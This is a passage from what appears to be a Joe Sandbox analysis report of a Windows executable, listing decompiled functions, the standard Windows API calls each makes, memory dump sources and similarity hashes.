                                                                                                                  • API String ID: 1592001646-0
                                                                                                                  • Opcode ID: 9d3e9e2e8a1bceeab06d95a0eaa41c2080bc7113f81abe03445b4d5243c8fc0a
                                                                                                                  • Instruction ID: 295589b9abc4920b6ad8c5466bd8bcdb44f9793aaea0101b85acc063a154db7e
                                                                                                                  • Opcode Fuzzy Hash: 9d3e9e2e8a1bceeab06d95a0eaa41c2080bc7113f81abe03445b4d5243c8fc0a
                                                                                                                  • Instruction Fuzzy Hash: 0C218C31E01108EFDF00DFA8C945BEEB7F9EF84344F584899E541AB241E731AA85CBA0
                                                                                                                  Function 00B42782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B4280A
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B42824
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B42832
                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B42840
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169480361-0
                                                                                                                  • Opcode ID: fbf77c0ac0766a6dcbdbf04752c19f6025178d2511d517318f3cfde5dee69032
                                                                                                                  • Instruction ID: c1bdf3778ab7f1bedd0858bc1e707ac259578037e027872ca15091bb12dd5ac3
                                                                                                                  • Opcode Fuzzy Hash: fbf77c0ac0766a6dcbdbf04752c19f6025178d2511d517318f3cfde5dee69032
                                                                                                                  • Instruction Fuzzy Hash: 7621D335205111AFD7149B24C845FAA7B99FF46324F148298F8268B6E2CB71FE42EB91
                                                                                                                  Function 00B178F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B18D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B1790A,?,000000FF,?,00B18754,00000000,?,0000001C,?,?), ref: 00B18D8C
                                                                                                                    • Part of subcall function 00B18D7D: lstrcpyW.KERNEL32(00000000,?,?,00B1790A,?,000000FF,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B18DB2
                                                                                                                    • Part of subcall function 00B18D7D: lstrcmpiW.KERNEL32(00000000,?,00B1790A,?,000000FF,?,00B18754,00000000,?,0000001C,?,?), ref: 00B18DE3
                                                                                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B17923
                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B17949
                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B17984
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                  • String ID: cdecl
                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                  • Opcode ID: cd54c97f6cac783a920ed95fc51a5d66b469ae49d2453bf8d94ff8729a6f18cd
                                                                                                                  • Instruction ID: 0d6c2b72209c60a69eb7723f42a93f7d3ccda747981c0285efc4d26c0e2c805d
                                                                                                                  • Opcode Fuzzy Hash: cd54c97f6cac783a920ed95fc51a5d66b469ae49d2453bf8d94ff8729a6f18cd
                                                                                                                  • Instruction Fuzzy Hash: 3711E13A200302ABCB159F34D844EBA77F9FF85790B90806AF906C72A4EF319941C7A1
                                                                                                                  Function 00B47CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B47D0B
                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B47D2A
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B47D42
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B2B7AD,00000000), ref: 00B47D6B
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 847901565-0
                                                                                                                  • Opcode ID: e8840548c4f5abb05468e06648cb8c52d74874a9e06f7737dd66551f7f70eefc
                                                                                                                  • Instruction ID: 030dead9d8050a57359b709366e864b7554bbe6fa1ec4a05093fa5061d377236
                                                                                                                  • Opcode Fuzzy Hash: e8840548c4f5abb05468e06648cb8c52d74874a9e06f7737dd66551f7f70eefc
                                                                                                                  • Instruction Fuzzy Hash: 1F11C071655614AFCB109F28CC04AAA3BE9FF46360B118764F839D72F0DB308A11DB40
                                                                                                                  Function 00B45660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 00B456BB
                                                                                                                  • _wcslen.LIBCMT ref: 00B456CD
                                                                                                                  • _wcslen.LIBCMT ref: 00B456D8
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B45816
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 455545452-0
                                                                                                                  • Opcode ID: fc365bf4305bf7b6edc919f4f024ec972fc5d27b84124f5ff59185d2e74a65a8
                                                                                                                  • Instruction ID: fa857321c5a0b761f29beb680aa43d0e9170cfb5d216be260af13418ae7e4887
                                                                                                                  • Opcode Fuzzy Hash: fc365bf4305bf7b6edc919f4f024ec972fc5d27b84124f5ff59185d2e74a65a8
                                                                                                                  • Instruction Fuzzy Hash: 1B11D375600A18A7DB309F65CCC5AEE77FCEF11760B1040A6F915DA182EB70DB84DB60
                                                                                                                  Function 00AE1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eba2e06a310e3342f821fb09de285d871c88af4ef24d92a9235cbd9b11a5cece
                                                                                                                  • Instruction ID: c1f75f54030f2649dfb539f9cffd071bcb1c4872677b54b89f0a2bffe8de0dd5
                                                                                                                  • Opcode Fuzzy Hash: eba2e06a310e3342f821fb09de285d871c88af4ef24d92a9235cbd9b11a5cece
                                                                                                                  • Instruction Fuzzy Hash: 1101D6B22096AA3EF651277A6CC1F27666CEF817B8F310325F521621D2DF718C004270
                                                                                                                  Function 00B11A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B11A47
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B11A59
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B11A6F
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B11A8A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 6ae4661400afc571c94a4ee76e1864739ee95b8e2eb3608cdcfbf5efa0018af3
                                                                                                                  • Instruction ID: 868e1fd2af9486f30a92447f4f6d6cfbccbcfc99c31442e9bb42b5f4eac65e5d
                                                                                                                  • Opcode Fuzzy Hash: 6ae4661400afc571c94a4ee76e1864739ee95b8e2eb3608cdcfbf5efa0018af3
                                                                                                                  • Instruction Fuzzy Hash: B311273A901219FFEB109BA8C985FEDBBB8EF08750F200491EA10B7294D6716E50DB94
                                                                                                                  Function 00B1E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B1E1FD
                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00B1E230
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B1E246
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B1E24D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2880819207-0
                                                                                                                  • Opcode ID: 6a30d8bc541a43d816687df36f20ae94c6725d131db21b6fe6ded9bd35b4f9a7
                                                                                                                  • Instruction ID: 05325aa754b957c5cd860327d6bdf03b5b71601c905551b635a04585fe9a8322
                                                                                                                  • Opcode Fuzzy Hash: 6a30d8bc541a43d816687df36f20ae94c6725d131db21b6fe6ded9bd35b4f9a7
                                                                                                                  • Instruction Fuzzy Hash: 95112676A05254BBC7019FAC9C09ADE7FECEB46720F404655FC24E32A1DBB0CE0087A0
                                                                                                                  Function 00ADD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNEL32(00000000,?,00ADCFF9,00000000,00000004,00000000), ref: 00ADD218
                                                                                                                  • GetLastError.KERNEL32 ref: 00ADD224
                                                                                                                  • __dosmaperr.LIBCMT ref: 00ADD22B
                                                                                                                  • ResumeThread.KERNEL32(00000000), ref: 00ADD249
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 173952441-0
                                                                                                                  • Opcode ID: b516f1ddfacf985de3ecb1a8778ba20d8bfb05167db05926ed4d083d17722ba1
                                                                                                                  • Instruction ID: dcdcf0dad6ffedb9bd1e781b6f4c8bdbd6ee9c0642bc74917292642efead044b
                                                                                                                  • Opcode Fuzzy Hash: b516f1ddfacf985de3ecb1a8778ba20d8bfb05167db05926ed4d083d17722ba1
                                                                                                                  • Instruction Fuzzy Hash: 98019236805204BBDB115BA5DC09BEB7E6DEF82731F10421AF927962D0DF718A41C6A0
                                                                                                                  Function 00AC990E Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00AC98D6
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00AC98E9
                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00AC98F1
                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ColorLongModeObjectStockTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2960364272-0
                                                                                                                  • Opcode ID: 23dd7f2d1062b341655ca24c3cd82529841405b0d9aaa986b0f8bfe22089011b
                                                                                                                  • Instruction ID: 4ec01e1d4ea7871f42e7ba9d0a7ebef2a3f4b04d80952fc2fcd8b0b0c2162553
                                                                                                                  • Opcode Fuzzy Hash: 23dd7f2d1062b341655ca24c3cd82529841405b0d9aaa986b0f8bfe22089011b
                                                                                                                  • Instruction Fuzzy Hash: 20116B3A1471808FD7128F24ECA9EE73F64EB5371171A019DE5829B2B3CA310A02DF61
                                                                                                                  Function 00B49EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00B49F31
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B49F3B
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B49F46
                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00B49F7A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4127811313-0
                                                                                                                  • Opcode ID: b642b13f4a4cacd3ddc0da37635fa8a0695df46c074f631ec239f8a999a1debe
                                                                                                                  • Instruction ID: b215272a618aec54753bee27c944fd82fb4fd05f1bcdeb0d926f9a7dc23e47b2
                                                                                                                  • Opcode Fuzzy Hash: b642b13f4a4cacd3ddc0da37635fa8a0695df46c074f631ec239f8a999a1debe
                                                                                                                  • Instruction Fuzzy Hash: BD11483690111AABDB00DF68D88A9EF7BB8FB46711F000495F911E3151DB30BF86DBA1
                                                                                                                  Function 00AB600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AB604C
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00AB6060
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB606A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3970641297-0
                                                                                                                  • Opcode ID: 44399b2dcf2b8f212be99c80133408ec6674645620b259d2540481224be7d0b6
                                                                                                                  • Instruction ID: bc98c09ad8ae9ccdbda27a7f655a15d6755c6f65e7092d44be37b16ff11c1c67
                                                                                                                  • Opcode Fuzzy Hash: 44399b2dcf2b8f212be99c80133408ec6674645620b259d2540481224be7d0b6
                                                                                                                  • Instruction Fuzzy Hash: 9411AD72102508BFEF125FA58C44EFABF6DFF097A5F044205FA0452022DB369C60DBA0
                                                                                                                  Function 00AD3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00AD3B56
                                                                                                                    • Part of subcall function 00AD3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00AD3AD2
                                                                                                                    • Part of subcall function 00AD3AA3: ___AdjustPointer.LIBCMT ref: 00AD3AED
                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00AD3B6B
                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00AD3B7C
                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00AD3BA4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 737400349-0
                                                                                                                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                  • Instruction ID: 1b06bfc43d7b2fdfd570aea24095507482a19626668498f1402b5cf15979eb74
                                                                                                                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                  • Instruction Fuzzy Hash: EE012933100148BBDF126F95CD46EEB3B69EF48794F04401AFE5956221C732E961EBA1
                                                                                                                  Function 00AE3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AB13C6,00000000,00000000,?,00AE301A,00AB13C6,00000000,00000000,00000000,?,00AE328B,00000006,FlsSetValue), ref: 00AE30A5
                                                                                                                  • GetLastError.KERNEL32(?,00AE301A,00AB13C6,00000000,00000000,00000000,?,00AE328B,00000006,FlsSetValue,00B52290,FlsSetValue,00000000,00000364,?,00AE2E46), ref: 00AE30B1
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AE301A,00AB13C6,00000000,00000000,00000000,?,00AE328B,00000006,FlsSetValue,00B52290,FlsSetValue,00000000), ref: 00AE30BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3177248105-0
                                                                                                                  • Opcode ID: e6c990ae29e61eaf0abf33d5b75c8ff953ee82219ff50317ecc94083336115f0
                                                                                                                  • Instruction ID: c9a5c8d3902474e1eedd31ac435e41bbb7b6e524abae9511f5aedb1257deb7ba
                                                                                                                  • Opcode Fuzzy Hash: e6c990ae29e61eaf0abf33d5b75c8ff953ee82219ff50317ecc94083336115f0
                                                                                                                  • Instruction Fuzzy Hash: 8601D037712262ABCF718B7BAC4CA677B98AF45B71B214620F905E7150DB21DE01C6D0
                                                                                                                  Function 00B17464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B1747F
                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B17497
                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B174AC
                                                                                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B174CA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
